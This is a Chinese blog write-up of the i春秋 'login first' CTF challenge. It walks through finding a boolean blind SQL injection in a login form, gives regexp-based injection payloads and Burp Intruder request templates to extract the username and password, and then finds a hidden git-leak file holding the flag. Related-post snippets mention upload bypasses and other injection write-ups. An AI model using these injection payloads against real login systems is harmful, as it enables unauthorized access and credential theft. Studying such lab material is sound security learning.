i春秋-先登陆再说 tips1:隐藏文件?非php源代码 tips2:缓存--盲注爆字段-git泄露-flag{a491cf3a-1a4e-405c-980f-ed1dc7a963a6}

于 2021-10-18 23:45:23 发布
阅读量470 收藏 1
点赞数
分类专栏: ctf 文章标签: php 缓存 git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hkk1151043545/article/details/120831074
版权

在这里插入图片描述
用户名admin’ or ‘1’=’1 密码随便输

弹出密码错误

再试试admin’ or ‘1’=’2

弹出用户不存在

说明这里存在注入点,而且是盲注

构造payload:admin’ or user_n3me regexp ‘^a’%23 (使用java的正则表达式来进行盲注,用#的url编码%23来注释掉后面的内容,^表示匹配开始的位置,$表示匹配结束的位置) 密码随意在这里插入图片描述
利用intruder 进行爆破,(user_n3me和p3ss_w0rd很特别,猜测为当前数据库中的两个表格)
用户名爆破语句“

username=admin' or user_n3me regexp '^§a§'%23&password=1111

密码爆破语句:

username=admin' or p3ss_w0rd regexp '^§a§'%23&password=1111

爆破出来用户名为bctf3dm1n, 密码2bfb1532857ddc0033fdae5bde3facdf
密码解密为:adminqwe123666

登录成功之后:存在 .bctfg1t 隐藏文件,
在这里插入图片描述在这里插入图片描述
flag.php.a17d89文件打开就是

<?php
echo '71ec9d5ca5580c58d1872962c596ea71.php';
//niubi 666
?>

flag{a491cf3a-1a4e-405c-980f-ed1dc7a963a6}

zac-
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTF writeup 1_网络安全实验室
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
buuctf web小结
qq_42551635的博客
04-25 4608
你传你*呢 .htaccess文件 AddType application/x-httpd-php xxx 本句话的作用是使该.htaccess文件所在目录及其子目录中的后缀为.xxx的文件被Apache当做php文件 一个傻逼错误 var/www/html 是网站根目录,也就等价于 http://55f19d33-bd47-48ac-9734-232c1632f237.node3.buuoj.cn 所以蚁剑里链接时不能重复输入 题解 上传.htaccess文件(注意绕过MIME) 然后上传图片马 ,o
tips2
mayayeung的专栏
06-08 1113
1. 什么是Activity? activity 是Context的子类     四大组件之一,   用户交互界面对应一个activity,处理与窗体用户交互的事件 开发常用的的有ListActivity , PreferenceActivity ,TabAcitivty等… 界面有共同的特点或者功能的时候,还会自己定义一个BaseActivity. 2.请描述一下Activi
密码学_用户名和密码
流风殇的工作心得
05-28 1130
解题链接:http://ctf8.simplexue.com/hash/ syclover:1004:83322BA5525EE54ED408E6B105741864:41A3B6E0FF72E91E3792CD571985ACB3::: 明显是解HASH,拿去ophcrack跑了一会儿跑出来。 拿去提交。 key:L
ctf-ichunqiu-crypto(rsa系列)
zhang14916的博客
07-24 7772
1.rsa256 下载文件,解压得到4个文件,打开message后缀文件里面都是乱码。打开public.key,观察其格式明显是openssl的公钥文件,再根据题目提示可知,我们拿到的message后缀文件是由该公钥rsa加密得到的,用openssl命令获取public.key中的n和e,发现n并不是很大,可以用msieve分解得到p,q。这样我们就可已得到d,用n,d对密文解密,将得到的16进...
CGCTF平台web题writeup
test
10-25 1万+
前言 正文 签到题 10pt tips : 这一定是最简单的 连接 恩,key在源代码中 md5 collision 20pt 连接 直接贴出了代码 $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' &amp;amp;amp;&amp;amp;amp; $md51 == $md5...
git-tips:Git모음집(https:github.comgit-tipstips한국어)
02-04
Git是世界上最流行的分布式版本控制系统,它允许开发人员追踪和管理代码变更,协同开发项目。`git-tips` 是一个在GitHub上广泛分享的资源集合,它汇总了各种实用的Git技巧和高级用法,旨在帮助用户更高效地利用Git。...
git-xl:Git扩展名:使git-diff适用于Excel工作簿(xls *文件类型)
02-04
Git XL-Excel的Git扩展(注意:Git XL以前称为“ git-... 安装Git XL后,Git可以像其他任何源代码文件一样对Excel VBA进行比较。 它是用Python编写的,具有可用于Windows的预编译二进制文件。 安装说明和文档可从。
git-tips:Git的奇技淫巧
02-04
本文将深入探讨“git-tips:Git的奇技淫巧”,揭示一些鲜为人知但常实用的Git技巧,以提升你的Git操作效率。 首,让我们了解一下Git的基础概念。Git的核心在于其分支模型,允许开发者在不同的分支上独立工作,...
git-revision:Ruby gem获取有关git源代码的信息
02-05
Git Revision是一个简单的(45 SLoC)Ruby gem,提供有关git源代码的基本信息。 您可以在应用程序中使用它,显示已部署的版本。 安装 添加到Gemfile: gem 'git-revision' 并运行: bundle install 用法 Git::...
atom-better-git-blame:Atom git blame gutter,具有拉取请求,相关问题和代码的年龄颜色编码
01-29
DR:它不仅仅在装订线中显示git blame批注-它还可以帮助您可视化显示blame信息,包括代码的使用期限。 丰富的弹出窗口显示有关提交的摘要信息,并可视化提交的年龄。 行高亮显示可清楚地归咎于blacommit引入了...
i春秋 WEB Login
A_dmin的博客
06-13 1312
i春秋 WEB Login 一天一道CTF题目,能多不能少 打开网页,发现登录,查看源代码,发现疑似账号密码的东西~: 登录,发现什么都没有,源码也没有什么~: 既然如此就抓包吧,bp启动: 发现一个奇怪的东西——show??: 那就把这个值变成1看看有没有什么变化: 得到源码: 源码如下: <!-- <?php include 'common.php'; $requset...
signature=8dfeb54e036883a518e97630c0013eed,unit3.lfm · BLumia/BLumiaTimidityShell - Gitee.com
热门推荐
weixin_39524425的博客
05-30 16万+
object Form3: TForm3Left = 357Height = 211Top = 100Width = 578BorderStyle = bsDialogCaption = 'About..'ClientHeight = 211ClientWidth = 578Color = clWindowOnShow = FormShowPosition = poScreenCenterLCLV...
i春秋 “百度杯”CTF比赛 十月场 登陆
include_heqile的博客
10-11 2542
https://www.ichunqiu.com/battalion?t=1&amp;r=0 进入题目链接,是一个登陆框 尝试admin' or 1=1#,密码随便输,返回页面密码错误 再尝试用户名随便输,密码随便输,返回页面用户名不存在 确定为bool盲注 使用python脚本执行盲注: #-*- coding:utf-8 -*- from urllib.request import urlop...
BugKu--login3(SKCTF)
超人学飞的日子
06-12 7483
Bugku的一道题目,用到了布尔盲注,还过滤了and关键字,这里用到了^(按位异或运算),正好记录下过程和方法。总体写的有点啰嗦,但是我不想让跟我一样入门的小白看教程看到一脸懵逼。题目地址:http://118.89.219.210:49167/index.php随便输入了几个用户名,返回用户名不存在,并没有对密码进行检验。那我们可以猜测是查找用户名,如果存在,再验证密码。那下一步呢,我试了试a...
N1CTF WEB WriteUp
heySister
03-13 4401
77777 作为一个小白,瑟瑟发抖地选择了这道被解出次数最多的题目….emmm…还是有一些收获的。 首题目给出了一些代码和一些信息: 信息是关于安装配置虚拟机的…和我之前配置环境的步骤,指令差不多…感觉应该没什么问题,就只是告诉我们服务器上有这个东西。 给出的代码就比较关键了。而且题目About 里说可以修改points ,告诉我们flag 是admin's password...
CTF解题笔记(1)
CODING...
01-09 1万+
因缺思汀的绕过 解题路径:http://ctf5.shiyanbar.com/web/pcat/index.php 打开后是一个登录框类似的东西,查看页面源码可以看到有source:source.txt的字样 打开连接:http://ctf5.shiyanbar.com/web/pcat/source.txt 可以看到登录的php逻辑: <?php error_rep
“百度杯”CTF比赛 十月场 登录
feng的博客
10-27 496
前言 一直觉得SQL注入是自己的弱项,主要的问题还是自己没有真正的做过一些和要和数据库连接的后端的项目,仅仅写过一个留言板。自己对于SQL注入的理解还是太浅。还是需要找时间去写点代码,去加深理解。 这题的SQL注入也确实是让自己涨姿势了。自己可以说学了MySQL就没有用过LIKE,一直以为它在SQL注入里没用,没想到居然可以这样。 WP 进入环境,是一个登录页面。尝试进行SQL注入,发现username为admin' or 1=1#的时候显示密码错误,username为admin' or 1=2#的时候显示
git-lfs filter-process --skip: 1: git-lfs: not found fatal: the remote end hung up unexpectedly
最新发布
08-30
git-lfs 是用于处理大文件Git 扩展,可以在 Git 仓库中存储大型二进制文件。你可以按照以下步骤来解决这个问题: 1. 确认你的系统是否已经安装了 git-lfs。你可以在终端执行以下命令来检查: ``` git lfs ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值